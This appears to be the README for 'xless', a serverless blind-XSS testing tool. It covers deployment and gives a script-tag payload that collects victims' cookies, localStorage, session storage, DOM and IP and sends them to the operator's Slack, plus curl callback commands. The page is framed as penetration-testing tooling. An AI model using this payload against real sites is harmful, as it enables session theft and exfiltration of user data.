- zeit.co account: zeit provides a free plan for serverless. If you use another provider for serverless, code changes should be minimal.
- Slack Incoming Webhook URL.
- Run
bash deploy.sh
$ bash deploy.sh
> Deploying ~/xless under X
> https://xless.now.sh [v2] [in clipboard] [4s]
> Success! Deployment ready [4s]
- Use the URL for blind XSS testing 🔥
Xless will automatically serve the XSS payload, collect information, and exfiltrate it into your serverless app, which is then sent right to you in Slack.
<script src="https://xless.now.sh"></script>
- Cookies
- User-Agent
- HTTP Referrer
- Browser DOM
- Browser Time
- Document Location
- Origin
- LocalStorage
- SessionStorage
- IP Address
Xless also works as an OOB (Out-of-Band) callbacks listener for HTTP/HTTPS requests. Any HTTP GET request that is sent to non-parent path will be alerted.
$ curl https://xless.now.sh/callback-canary
Or anything random, such as:
$ curl https://xless.now.sh/88bf0ecd
You can view a number of handy XSS payloads for your xless app at $URL/examples
- URL:
https://xless.now.sh/examples
Once you deploy your app, you can find the examples there.
Contribution is very welcome. Please share your ideas by Github issues and pull requests.
Here are some ideas to start with:
- Enabling sharing of page screenshot - Check
test.payload.js
. - Your idea of a new feature?
- Matthew Bryant for the XSS Hunter project.
- Rami Ahmed for the "xless" name idea.
- Damian Ebelties for the logo.
- Zeit.co for operating a great serverless platform.
This project is made for educational and ethical testing purposes only. Usage of xless for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
The project is currently licensed under MIT License.
Mazin Ahmed
- Website: https://mazinahmed.net
- Email: mazin [at] mazinahmed [dot] net
- Twitter: https://twitter.com/mazen160
- Linkedin: http://linkedin.com/in/infosecmazinahmed